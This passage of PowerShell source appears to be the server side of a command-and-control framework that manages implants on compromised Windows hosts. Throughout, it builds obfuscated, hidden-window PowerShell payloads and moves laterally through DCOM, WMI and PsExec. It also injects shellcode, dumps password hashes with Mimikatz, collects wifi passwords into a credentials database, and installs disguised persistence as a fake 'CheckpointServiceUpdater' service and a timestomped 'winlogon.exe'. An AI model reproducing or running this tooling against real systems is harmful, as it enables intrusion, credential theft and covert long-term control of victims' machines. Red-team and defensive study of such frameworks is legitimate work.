if (`$method -eq "GET") {
`$message = (Get-Webclient -Cookie `$cookiesin).DownloadString("`$(`$Server)`$(`$url)")
}
if (`$method -eq "POST") {
`$message = (Get-Webclient -Cookie `$cookiesin).UploadData("`$(`$Server)`$(`$url)", `$buffer)
}
}
if (!`$message) {
`$message = `$httpresponse
echo `$request
}
[byte[]] `$buffer = [System.Text.Encoding]::UTF8.GetBytes(`$message)
`$response.ContentLength64 = `$buffer.length
`$response.StatusCode = 200
`$response.Headers.Add("CacheControl", "no-cache, no-store, must-revalidate")
`$response.Headers.Add("Pragma", "no-cache")
`$response.Headers.Add("Expires", 0)
`$output = `$response.OutputStream
`$output.Write(`$buffer, 0, `$buffer.length)
`$output.Close()
`$message = `$null
}
`$listener.Stop()
"@
$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($fdsf)
$CompressedStream = New-Object IO.MemoryStream
$DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
$DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
$DeflateStream.Dispose()
$CompressedScriptBytes = $CompressedStream.ToArray()
$CompressedStream.Dispose()
$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)
$NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'
$UnicodeEncoder = New-Object System.Text.UnicodeEncoding
$EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript))
$rundaisy = @"
$fwcmd
`$t = Invoke-Netstat| ? {`$_.ListeningPort -eq $port}
`$global:kill = [HashTable]::Synchronized(@{})
`$kill.log = "1"
function Stop-Daisy {
`$kill.log = 2
Netsh.exe advfirewall firewall del rule name=`"$firewallName`"
(new-object system.net.webclient).downloadstring("http://localhost:$port")
}
if (!`$t) {
if (Test-Administrator) {
`$Runspace = [RunspaceFactory]::CreateRunspace()
`$Runspace.Open()
`$Runspace.SessionStateProxy.SetVariable('Kill',`$Kill)
`$Jobs = @()
`$Job = [powershell]::Create().AddScript({$NewScript})
`$Job.Runspace = `$Runspace
`$Job.BeginInvoke() | Out-Null
echo ""
echo "[+] Running DaisyServer as Administrator:"
} else {
`$Runspace = [RunspaceFactory]::CreateRunspace()
`$Runspace.Open()
`$Runspace.SessionStateProxy.SetVariable('Kill',`$Kill)
`$Jobs = @()
`$Job = [powershell]::Create().AddScript({$NewScript})
`$Job.Runspace = `$Runspace
`$Job.BeginInvoke() | Out-Null
echo ""
echo "[+] Running DaisyServer as Standard User, must use -localhost flag for this to work:"
}
echo "[+] To stop the Daisy Server, Stop-Daisy current process"
}
"@
return $rundaisy
}
function Resolve-PathSafe
{
param
(
[string] $Path
)
$ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($Path)
}
Function Get-FileName($Dir)
{
[System.Reflection.Assembly]::LoadWithPartialName("System.windows.forms") | Out-Null
$OpenFileDialog = New-Object System.Windows.Forms.OpenFileDialog
$OpenFileDialog.initialDirectory = $Dir
$OpenFileDialog.filter = "ANY *.* | *.*"
$OpenFileDialog.ShowDialog() | Out-Null
$OpenFileDialog.filename
}
function Upload-File
{
param
(
[string] $Source,
[string] $Destination
)
if (!$Source) {
$Source = Get-FileName "C:\"
}
if (!$Destination) {
$Destination = Read-Host "Destination Location\File Name (C:\Temp\File.txt)"
}
$Source = Resolve-PathSafe $Source
$bufferSize = 90000
$buffer = New-Object byte[] $bufferSize
$reader = [System.IO.File]::OpenRead($Source)
$base64 = $null
$bytesRead = 0
do
{
$bytesRead = $reader.Read($buffer, 0, $bufferSize);
$base64 += ([Convert]::ToBase64String($buffer, 0, $bytesRead));
} while ($bytesRead -eq $bufferSize);
"Upload-File -Destination `"$Destination`" -Base64 $base64"
$reader.Dispose()
}
function CheckModuleLoaded {
param
(
[string] $ModuleName,
[string] $IMRandomURI
)
$ModuleName = $ModuleName.ToLower();
$modsloaded = Invoke-SqliteQuery -DataSource $Database -Query "SELECT ModsLoaded FROM Implants WHERE RandomURI='$IMRandomURI'" -As SingleValue
if (!$modsloaded.contains("$ModuleName")){
$modsloaded = $modsloaded + " $ModuleName"
Invoke-SqliteQuery -DataSource $Database -Query "UPDATE Implants SET ModsLoaded='$modsloaded' WHERE RandomURI='$IMRandomURI'"|Out-Null
$query = "INSERT INTO NewTasks (RandomURI, Command)
VALUES (@RandomURI, @Command)"
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $IMRandomURI
Command = "LoadModule $ModuleName"
} | Out-Null
}
}
function RunImplantCommand {
param
(
[string] $Command,
[string] $IMRandomURI
)
$query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)"
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $IMRandomURI
Command = $Command
} | Out-Null
}
function creds {
param
(
[string] $action,
[string] $username,
[string] $password,
[string] $hash,
[string] $credsID
)
switch ($action){
"dump" {
$dbResult = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM Creds" -As PSObject
Write-Output -InputObject $dbResult | ft -AutoSize | Out-Host
$t = $dbResult | ft -AutoSize | Out-String
return $t
}
"add" {
if ($password){
$t = add-creds -username $username -password $password
return $t
} elseif ($hash){
$t = add-creds -username $username -hash $hash
return $t
} else {
return "Unable to create credentials in database."
}
}
"del" {
$t = Del-Creds $CredsID
return $t
}
"search" {
$t = Search-Creds $username
return $t
}
default {
return "No action defined for: '$action'"
}
}
}
function Add-Creds {
param
(
[string] $Username,
[string] $Password,
[string] $Hash
)
if ($Username){
Invoke-SqliteQuery -DataSource $Database -Query "INSERT INTO Creds (username, password, hash) VALUES ('$username','$password','$hash')"|Out-Null
return "$Username added to the database"
} else {
return "No username or password specified. Please complete both arguments."
}
}
function Search-Creds {
param
(
[string] $Username
)
if ($Username){
$dbResult = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM Creds WHERE username LIKE '%$username%'" -As PSObject
Write-Output -InputObject $dbResult | ft -AutoSize | Out-Host
return $dbResult | ft -AutoSize | Out-String
} else {
return "No username specified. Please complete all necessary arguments."
}
}
function Del-Creds {
param
(
[string] $CredsID
)
if ($credsID){
$dbResult = Invoke-SqliteQuery -Datasource $database -Query "SELECT credsid, username FROM Creds Where CredsID == '$credsID'" -As DataRow
$caption = "Delete Credentials from Database?";
$message = "Credential: " + $dbResult.Item(0) + " - " + $dbResult.Item(1);
$yes = new-Object System.Management.Automation.Host.ChoiceDescription "&Yes","YES";
$no = new-Object System.Management.Automation.Host.ChoiceDescription "&No","NO";
$choices = [System.Management.Automation.Host.ChoiceDescription[]]($yes,$no);
$answer = $host.ui.PromptForChoice($caption,$message,$choices,0)
switch ($answer){
0 {Invoke-SqliteQuery -Datasource $database -Query "DELETE FROM Creds Where CredsID == '$credsID'" | out-null; return "Deleting Credentials"}
1 {return "No selected, no changes made";}
}
} else {
return "No CredsID specified. Please complete all necessary arguments."
}
}
function invoke-dcomdaisypayload {
param(
[Parameter(Mandatory=$true)][string]$target,
[Parameter(Mandatory=$true)][string]$name
)
if (Test-Path "$FolderPath\payloads\$($name).bat"){
$proxypayload = Get-Content -Path "$FolderPath\payloads\$($name).bat"
$pscommand = "`$c = [activator]::CreateInstance([type]::GetTypeFromProgID(`"MMC20.Application`",`"$target`")); `$c.Document.ActiveView.ExecuteShellCommand(`"C:\Windows\System32\cmd.exe`",`$null,`"/c $proxypayload`",`"7`")"
return $pscommand
} else {
write-host "Need to run Invoke-DaisyChain first"
return $null
}
}
function invoke-wmidaisypayload {
param(
[Parameter(Mandatory=$true)][string]$target,
[Parameter(Mandatory=$true)][string]$name,
[Parameter(Mandatory=$true)][string]$domain,
[Parameter(Mandatory=$true)][string]$user,
[Parameter(Mandatory=$false)][string]$password,
[Parameter(Mandatory=$false)][string]$hash
)
if (Test-Path "$FolderPath\payloads\$($name).bat"){
CheckModuleLoaded "Invoke-WMIExec.ps1" $psrandomuri
$proxypayload = Get-Content -Path "$FolderPath\payloads\$($name).bat"
$pscommand = $pscommand -replace 'Invoke-WMIDaisyPayload', 'Invoke-WMIExec'
return $pscommand + " -command '$proxypayload'"
} else {
write-host "Need to run Invoke-DaisyChain first"
return $null
}
}
function invoke-psexecdaisypayload {
param(
[Parameter(Mandatory=$true)][string]$target,
[Parameter(Mandatory=$true)][string]$name,
[Parameter(Mandatory=$true)][string]$domain,
[Parameter(Mandatory=$true)][string]$user,
[Parameter(Mandatory=$false)][string]$password,
[Parameter(Mandatory=$false)][string]$hash
)
if (Test-Path "$FolderPath\payloads\$($name).bat"){
CheckModuleLoaded "Invoke-PsExec.ps1" $psrandomuri
$proxypayload = Get-Content -Path "$FolderPath\payloads\$($name).bat"
$pscommand = $pscommand -replace 'Invoke-PsExecDaisyPayload', 'Invoke-PsExec'
$proxypayload = $proxypayload -replace "powershell -exec bypass -Noninteractive -windowstyle hidden -e ", ""
$rawpayload = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($proxypayload))
$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($rawpayload)
$CompressedStream = New-Object IO.MemoryStream
$DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
$DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
$DeflateStream.Dispose()
$CompressedScriptBytes = $CompressedStream.ToArray()
$CompressedStream.Dispose()
$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)
$NewPayload = 'iex(New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'
return $pscommand + " -command `"powershell -exec bypass -Noninteractive -windowstyle hidden -c $NewPayload`""
} else {
write-host "Need to run Invoke-DaisyChain first"
return $null
}
}
function migrate-daisy {
param(
$name, [switch]$x86, [switch]$x64, $ProcID, $ProcessPath, $arch
)
$params = ""
if ($x64.IsPresent) {$params = $params + " -x64"}
if ($x86.IsPresent) {$params = $params + " -x86"}
if ($ProcessPath) {$params = $params + " -ProcessPath $ProcessPath"}
if ($ProcID) {$params = $params + " -ProcID $ProcID"}
if (Test-Path "$FolderPath\payloads\DaisyPosh_$($name)-shellcode_x$($arch).bin"){
CheckModuleLoaded "Inject-Shellcode.ps1" $psrandomuri
$bytes = (Get-Content "$FolderPath\payloads\DaisyPosh_$($name)-shellcode_x$($arch).bin" -Encoding Byte)
$base64 = [System.Convert]::ToBase64String($bytes)
$commandstring = "`$Shellcode$($arch) = `"$base64`""
RunImplantCommand $commandstring $psrandomuri
return "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String(`$Shellcode$($arch))) $($params)"
} else {
write-host "Need to run Invoke-DaisyChain first"
return $null
}
}
function migrate($psrandomuri, $params) {
$dbresult = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM Implants WHERE RandomURI='$psrandomuri'" -As PSObject
$im_arch = $dbresult.Arch
$im_type = $dbresult.Pivot
if ($im_arch -eq "AMD64"){
$arch = "64"
} else {
$arch = "86"
}
if ($params -like "*x86*"){
$arch = "86"
}
if ($params -like "*x64*"){
$arch = "64"
}
CheckModuleLoaded "Inject-Shellcode.ps1" $psrandomuri
if ($im_type -eq "Normal"){
if (Test-Path "$FolderPath\payloads\Posh-shellcode_x$($arch).bin"){
$bytes = (Get-Content "$FolderPath\payloads\Posh-shellcode_x$($arch).bin" -Encoding Byte)
$base64 = [System.Convert]::ToBase64String($bytes)
$commandstring = "`$Shellcode$($arch) = `"$base64`""
RunImplantCommand $commandstring $psrandomuri
return "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String(`$Shellcode$($arch))) $($params)"
} else {
write-host "Error cannot find shellcode"
return $null
}
}
elseif ($im_type -eq "Daisy"){
$Name = read-host "Name required: "
if (Test-Path "$FolderPath\payloads\DaisyPosh_$($name)-shellcode_x$($arch).bin"){
$bytes = (Get-Content "$FolderPath\payloads\DaisyPosh_$($name)-shellcode_x$($arch).bin" -Encoding Byte)
$base64 = [System.Convert]::ToBase64String($bytes)
$commandstring = "`$Shellcode$($arch) = `"$base64`""
RunImplantCommand $commandstring $psrandomuri
return "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String(`$Shellcode$($arch))) $($params)"
} else {
write-host "Need to run Invoke-DaisyChain first"
return $null
}
}
elseif ($im_type -eq "Proxy"){
if (Test-Path "$FolderPath\payloads\ProxyPosh-shellcode_x$($arch).bin"){
$bytes = (Get-Content "$FolderPath\payloads\ProxyPosh-shellcode_x$($arch).bin" -Encoding Byte)
$base64 = [System.Convert]::ToBase64String($bytes)
$commandstring = "`$Shellcode$($arch) = `"$base64`""
RunImplantCommand $commandstring $psrandomuri
return "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String(`$Shellcode$($arch))) $($params)"
} else {
write-host "Need to run CreateProxyPayload first"
return $null
}
}
}
function Get-CompressedByteArray ([byte[]] $byteArray) {
[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
$gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
$gzipStream.Write( $byteArray, 0, $byteArray.Length )
$gzipStream.Close()
$output.Close()
[Convert]::ToBase64String($output.ToArray())
}
function Get-DecompressedByteArray ([byte[]] $byteArray) {
$input = New-Object System.IO.MemoryStream( , $byteArray )
$output = New-Object System.IO.MemoryStream
$gzipStream = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)
$gzipStream.CopyTo( $output )
$gzipStream.Close()
$input.Close()
[byte[]] $byteOutArray = $output.ToArray()
$byteOutArray
}
startup
function runcommand {
param
(
[string] $pscommand,
[string] $psrandomuri
)
if (($pscommand.ToLower().StartsWith('load-module')) -or ($pscommand.ToLower().StartsWith('loadmodule')))
{
$pscommand = $pscommand -replace "load-module","loadmodule"
$params = $pscommand -replace "loadmodule",""
if (!$params) {
$params = Get-FileName -Dir "$($PoshPath)\Modules"
$pscommand = "$($pscommand) $($params)"
}
}
if ($pscommand.ToLower() -eq 'inject-shellcode')
{
CheckModuleLoaded "Inject-Shellcode.ps1" $psrandomuri
$fileName = Get-FileName -Dir "$FolderPath\payloads\"
$ScriptBytes = Get-Content "$fileName" -Encoding Byte
$base64Stream = Get-CompressedByteArray -byteArray $ScriptBytes
$Params = Read-Host "Any parameters?"
$query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)"
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = '$t="'+$base64Stream+'";$g = New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,[Convert]::FromBase64String($t))), ([IO.Compression.CompressionMode]::Decompress); $g.CopyTo(($o = New-Object System.IO.MemoryStream));'
} | Out-Null
$pscommand = "Inject-Shellcode -Shellcode (`$o.ToArray()) $Params"
}
if ($pscommand)
{
CheckModuleLoaded "Implant-Core.ps1" $psrandomuri
}
if ($pscommand -eq 'Get-ExternalIP')
{
$pscommand = '(get-webclient).downloadstring("http://ipecho.net/plain")'
}
if ($pscommand -eq 'getuid')
{
$pscommand = $null
$dbresult = Invoke-SqliteQuery -DataSource $Database -Query "SELECT Domain FROM Implants WHERE RandomURI='$psrandomuri'" -As SingleValue
Write-Host $dbresult
}
if ($pscommand -eq 'ps')
{
$pscommand = 'get-processfull'
}
if ($pscommand -eq 'id')
{
$pscommand = $null
$dbresult = Invoke-SqliteQuery -DataSource $Database -Query "SELECT Domain FROM Implants WHERE RandomURI='$psrandomuri'" -As SingleValue
Write-Host $dbresult
}
if ($pscommand -eq 'whoami')
{
$pscommand = $null
$dbresult = Invoke-SqliteQuery -DataSource $Database -Query "SELECT Domain FROM Implants WHERE RandomURI='$psrandomuri'" -As SingleValue
Write-Host $dbresult
}
if ($pscommand -eq 'Kill-Implant')
{
$pscommand = 'exit'
Invoke-SqliteQuery -DataSource $Database -Query "UPDATE Implants SET Alive='No' WHERE RandomURI='$psrandomuri'"|Out-Null
}
if ($pscommand -eq 'Show-ServerInfo')
{
$pscommand = $null
$dbresult = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM C2Server" -As PSObject
Write-Host $dbresult
}
if ($pscommand -eq 'get-pid')
{
$pscommand = $null
$dbresult = Invoke-SqliteQuery -DataSource $Database -Query "SELECT PID FROM Implants WHERE RandomURI='$psrandomuri'" -As SingleValue
Write-Host $dbresult
}
if ($pscommand -eq 'Get-ImplantWorkingDirectory')
{
$pscommand = $null
$dbresult = Invoke-SqliteQuery -DataSource $Database -Query "SELECT FolderPath FROM C2Server" -As SingleValue
Write-Host $dbresult
}
if ($pscommand.ToLower().StartsWith('installexe-persistence'))
{
$cmd = $pscommand -replace "installexe-persistence ",""
$cmd = $cmd -replace "installexe-persistence",""
$output = upload-file -source $cmd -destination "`$env:temp\winlogon.exe"
RunImplantCommand $output $psrandomuri
$commandstring2 = "TimeStomp `$env:temp\winlogon.exe `"01/03/2008 12:12 pm`""
RunImplantCommand $commandstring2 $psrandomuri
$pscommand = "InstallExe-Persistence"
}
if ($pscommand -eq 'ListModules')
{
$pscommand = $null
Write-Host -Object "Reading modules from `$env:PSModulePath\* and $PoshPath\Modules\*"
$folders = $env:PSModulePath -split ";"
foreach ($item in $folders) {
$PSmod = Get-ChildItem -Path $item -Include *.ps1 -Name
foreach ($mod in $PSmod)
{
Write-Host $mod
}
}
$listmodules = Get-ChildItem -Path "$PoshPath\Modules" -Name
foreach ($mod in $listmodules)
{
Write-Host $mod
}
Write-Host -Object ""
}
if ($pscommand -eq 'ModulesLoaded')
{
$pscommand = $null
$mods = Invoke-SqliteQuery -DataSource $Database -Query "SELECT ModsLoaded FROM Implants WHERE RandomURI='$psrandomuri'" -As SingleValue
Write-Host $mods
}
if ($pscommand -eq 'Remove-ServiceLevel-Persistence')
{
$pscommand = "sc.exe delete CPUpdater"
}
if ($pscommand -eq 'Install-ServiceLevel-Persistence')
{
$payload = Get-Content -Path "$FolderPath\payloads\payload.bat"
$pscommand = "sc.exe create CPUpdater binpath= 'cmd /c "+$payload+"' Displayname= CheckpointServiceUpdater start= auto"
}
if ($pscommand -eq 'Install-ServiceLevel-PersistenceWithProxy')
{
if (Test-Path "$FolderPath\payloads\proxypayload.bat"){
$payload = Get-Content -Path "$FolderPath\payloads\proxypayload.bat"
$pscommand = "sc.exe create CPUpdater binpath= 'cmd /c "+$payload+"' Displayname= CheckpointServiceUpdater start= auto"
} else {
write-host "Need to run CreateProxyPayload first"
$pscommand = $null
}
}
if ($pscommand.ToLower().StartsWith('invoke-wmiproxypayload'))
{
if (Test-Path "$FolderPath\payloads\proxypayload.bat"){
CheckModuleLoaded "Invoke-WMIExec.ps1" $psrandomuri
$proxypayload = Get-Content -Path "$FolderPath\payloads\proxypayload.bat"
$pscommand = $pscommand -replace 'Invoke-WMIProxyPayload', 'Invoke-WMIExec'
$pscommand = $pscommand + " -command '$proxypayload'"
} else {
write-host "Need to run CreateProxyPayload first"
$pscommand = $null
}
}
if ($pscommand.ToLower().StartsWith('invoke-dcomproxypayload'))
{
if (Test-Path "$FolderPath\payloads\proxypayload.bat"){
$proxypayload = Get-Content -Path "$FolderPath\payloads\proxypayload.bat"
$target = $pscommand -replace 'invoke-dcomproxypayload -target ', ''
$pscommand = "`$c = [activator]::CreateInstance([type]::GetTypeFromProgID(`"MMC20.Application`",`"$target`")); `$c.Document.ActiveView.ExecuteShellCommand(`"C:\Windows\System32\cmd.exe`",`$null,`"/c $proxypayload`",`"7`")"
} else {
write-host "Need to run CreateProxyPayload first"
$pscommand = $null
}
}
if ($pscommand.ToLower().StartsWith('invoke-dcomdaisypayload'))
{
$pscommand = IEX $pscommand
}
if ($pscommand.ToLower().StartsWith('invoke-dcompayload'))
{
$payload = Get-Content -Path "$FolderPath\payloads\payload.bat"
$target = $pscommand -replace 'invoke-dcomdaisypayload -target ', ''
$pscommand = "`$c = [activator]::CreateInstance([type]::GetTypeFromProgID(`"MMC20.Application`",`"$target`")); `$c.Document.ActiveView.ExecuteShellCommand(`"C:\Windows\System32\cmd.exe`",`$null,`"/c $payload`",`"7`")"
}
if ($pscommand.ToLower().StartsWith('invoke-wmidaisypayload'))
{
$pscommand = IEX $pscommand
}
if ($pscommand.ToLower().StartsWith('invoke-wmipayload'))
{
if (Test-Path "$FolderPath\payloads\payload.bat"){
CheckModuleLoaded "Invoke-WMIExec.ps1" $psrandomuri
$payload = Get-Content -Path "$FolderPath\payloads\payload.bat"
$pscommand = $pscommand -replace 'Invoke-WMIPayload', 'Invoke-WMIExec'
$pscommand = $pscommand + " -command '$payload'"
} else {
write-host "Can't find the payload.bat file, run CreatePayload first"
$pscommand = $null
}
}
if ($pscommand.ToLower().StartsWith('invoke-psexecproxypayload'))
{
if (Test-Path "$FolderPath\payloads\proxypayload.bat"){
CheckModuleLoaded "Invoke-PsExec.ps1" $psrandomuri
$proxypayload = Get-Content -Path "$FolderPath\payloads\proxypayload.bat"
$pscommand = $pscommand -replace 'Invoke-PsExecProxyPayload', 'Invoke-PsExec'
$proxypayload = $proxypayload -replace "powershell -exec bypass -Noninteractive -windowstyle hidden -e ", ""
$rawpayload = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($proxypayload))
$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($rawpayload)
$CompressedStream = New-Object IO.MemoryStream
$DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
$DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
$DeflateStream.Dispose()
$CompressedScriptBytes = $CompressedStream.ToArray()
$CompressedStream.Dispose()
$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)
$NewPayload = 'iex(New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'
$pscommand = $pscommand + " -command `"powershell -exec bypass -Noninteractive -windowstyle hidden -c $NewPayload`""
} else {
write-host "Need to run CreateProxyPayload first"
$pscommand = $null
}
}
if ($pscommand.ToLower().StartsWith('invoke-psexecdaisypayload'))
{
$pscommand = IEX $pscommand
}
if ($pscommand.ToLower().StartsWith('invoke-psexecpayload'))
{
if (Test-Path "$FolderPath\payloads\payload.bat"){
CheckModuleLoaded "Invoke-PsExec.ps1" $psrandomuri
$proxypayload = Get-Content -Path "$FolderPath\payloads\payload.bat"
$pscommand = $pscommand -replace 'Invoke-PsExecPayload', 'Invoke-PsExec'
$proxypayload = $proxypayload -replace "powershell -exec bypass -Noninteractive -windowstyle hidden -e ", ""
$rawpayload = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($proxypayload))
$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($rawpayload)
$CompressedStream = New-Object IO.MemoryStream
$DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
$DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
$DeflateStream.Dispose()
$CompressedScriptBytes = $CompressedStream.ToArray()
$CompressedStream.Dispose()
$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)
$NewPayload = 'iex(New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'
$pscommand = $pscommand + " -command `"powershell -exec bypass -Noninteractive -windowstyle hidden -c $NewPayload`""
} else {
write-host "Can't find the payload.bat file, run CreatePayload first"
$pscommand = $null
}
}
if ($pscommand.ToLower().StartsWith('hashdump'))
{
CheckModuleLoaded "Invoke-Mimikatz.ps1" $psrandomuri
$pscommand = "Invoke-Mimikatz -Command `'`"lsadump::sam`"`'"
}
if ($pscommand.ToLower().StartsWith('get-wlanpass'))
{
CheckModuleLoaded "Get-WLANPass.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-sqlquery'))
{
CheckModuleLoaded "Invoke-SqlQuery.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('get-firewall'))
{
CheckModuleLoaded "Get-FirewallRules.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('migrate-proxy-x86'))
{
$psargs = $pscommand -replace 'migrate-proxypayload-x86',''
if (Test-Path "$FolderPath\payloads\ProxyPosh-shellcode_x86.bin"){
CheckModuleLoaded "Inject-Shellcode.ps1" $psrandomuri
$bytes = (Get-Content "$FolderPath\payloads\ProxyPosh-shellcode_x86.bin" -Encoding Byte)
$base64 = [System.Convert]::ToBase64String($bytes)
$commandstring = "`$Shellcode86 = `"$base64`""
RunImplantCommand $commandstring $psrandomuri
$pscommand = "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String(`$Shellcode86)) $($psargs)"
} else {
if (Test-Path "$FolderPath\payloads\proxypayload.bat"){
CheckModuleLoaded "Invoke-ReflectivePEInjection.ps1" $psrandomuri
$proxypayload = gc "$FolderPath\payloads\proxypayload.bat"
$query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)"
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = "`$proxypayload = `"$proxypayload`""
} | Out-Null
CheckModuleLoaded "NamedPipeProxy.ps1" $psrandomuri
$pscommand = "invoke-reflectivepeinjection -payload Proxy_x86 $($psargs)"
} else {
write-host "Need to run CreateProxyPayload first"
$pscommand = $null
}
}
}
if ($pscommand.ToLower().StartsWith('migrate-proxy-x64'))
{
$psargs = $pscommand -replace 'migrate-proxypayload-x64',''
if (Test-Path "$FolderPath\payloads\ProxyPosh-shellcode_x64.bin"){
CheckModuleLoaded "Inject-Shellcode.ps1" $psrandomuri
$bytes = (Get-Content "$FolderPath\payloads\ProxyPosh-shellcode_x64.bin" -Encoding Byte)
$base64 = [System.Convert]::ToBase64String($bytes)
$commandstring = "`$Shellcode64 = `"$base64`""
RunImplantCommand $commandstring $psrandomuri
$pscommand = "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String(`$Shellcode64)) $($psargs)"
} else {
if (Test-Path "$FolderPath\payloads\proxypayload.bat"){
CheckModuleLoaded "Invoke-ReflectivePEInjection.ps1" $psrandomuri
$proxypayload = gc "$FolderPath\payloads\proxypayload.bat"
$query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)"
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = "`$proxypayload = `"$proxypayload`""
} | Out-Null
CheckModuleLoaded "NamedPipeProxy.ps1" $psrandomuri
$pscommand = "invoke-reflectivepeinjection -payload Proxy_x64 $($psargs)"
} else {
write-host "Need to run CreateProxyPayload first"
$pscommand = $null
}
}
}
if ($pscommand.ToLower().StartsWith('migrate-x86'))
{
$psargs = $pscommand -replace 'migrate-x86',''
if (Test-Path "$FolderPath\payloads\Posh-shellcode_x86.bin"){
CheckModuleLoaded "Inject-Shellcode.ps1" $psrandomuri
$bytes = (Get-Content "$FolderPath\payloads\Posh-shellcode_x86.bin" -Encoding Byte)
$base64 = [System.Convert]::ToBase64String($bytes)
$commandstring = "`$Shellcode86 = `"$base64`""
RunImplantCommand $commandstring $psrandomuri
$pscommand = "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String(`$Shellcode86)) $($psargs)"
} else {
CheckModuleLoaded "Invoke-ReflectivePEInjection.ps1" $psrandomuri
CheckModuleLoaded "NamedPipe.ps1" $psrandomuri
$pscommand = "invoke-reflectivepeinjection -payload x86 $($psargs)"
}
}
if ($pscommand.ToLower().StartsWith('migrate-x64'))
{
$psargs = $pscommand -replace 'migrate-x64',''
if (Test-Path "$FolderPath\payloads\Posh-shellcode_x64.bin"){
CheckModuleLoaded "Inject-Shellcode.ps1" $psrandomuri
$bytes = (Get-Content "$FolderPath\payloads\Posh-shellcode_x64.bin" -Encoding Byte)
$base64 = [System.Convert]::ToBase64String($bytes)
$commandstring = "`$Shellcode64 = `"$base64`""
RunImplantCommand $commandstring $psrandomuri
$pscommand = "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String(`$Shellcode64)) $($psargs)"
} else {
CheckModuleLoaded "Invoke-ReflectivePEInjection.ps1" $psrandomuri
CheckModuleLoaded "NamedPipe.ps1" $psrandomuri
$pscommand = "Invoke-Shellcode $($psargs)"
}
}
if ($pscommand.ToLower().StartsWith('migrate-daisy-x86'))
{
$pscommand = $pscommand -replace 'migrate-daisy-x86','migrate-daisy -arch 86'
$pscommand = IEX $pscommand
}
if ($pscommand.ToLower().StartsWith('migrate-daisy-x64'))
{
$pscommand = $pscommand -replace 'migrate-daisy-x64','migrate-daisy -arch 64'
$pscommand = IEX $pscommand
}
if ($pscommand.ToLower().StartsWith('migrate'))
{
$pscommand = $pscommand -replace 'migrate ',''
$pscommand = $pscommand -replace 'migrate',''
$pscommand = IEX "migrate $psrandomuri `"$pscommand`""
}
if ($pscommand.ToLower().StartsWith('invoke-psinject-payload'))
{
CheckModuleLoaded "Invoke-ReflectivePEInjection.ps1" $psrandomuri
CheckModuleLoaded "NamedPipe.ps1" $psrandomuri
$psargs = $pscommand -replace 'invoke-psinject-payload',''
$pscommand = "invoke-reflectivepeinjection $($psargs)"
}
